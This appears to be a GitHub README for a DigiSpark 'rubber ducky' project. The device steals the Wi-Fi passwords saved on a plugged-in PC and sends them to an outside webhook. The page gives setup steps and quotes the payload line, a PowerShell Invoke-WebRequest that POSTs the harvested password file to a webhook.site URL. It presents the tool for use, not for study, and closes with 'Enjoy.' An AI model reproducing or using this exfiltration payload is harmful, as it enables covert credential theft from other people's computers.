Skip to content

Latest commit

 

History

History
27 lines (21 loc) · 1.47 KB

README.md

File metadata and controls

27 lines (21 loc) · 1.47 KB

wifi-grabber-ducky

USB rubber ducky that grabs saved wifi password from pc and sends into a webhook site. This is highly inspired from Cyber Mentor's video.

Requirements

Usage

  1. Go to Webhook Site.

  2. Copy your unique URL.

    image

  3. Download wifi-key-grab.ino file and edit it using Arduino IDE.

  4. In line 42 or in the line of code below, change the webhook url to your unique URL.

DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/2265df61-338c-470f-a0ec-0f6011dc9a16 -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  1. Once set, compile your program in Arduino IDE.
  2. Plug in your DigiSpark USB, then upload the program.
  3. Enjoy.

Demo

wifi-key-grabber-demo

Note:

If ever you're going to use it again, make sure to repeat the steps again, as webhook URLs tend to reset after some time.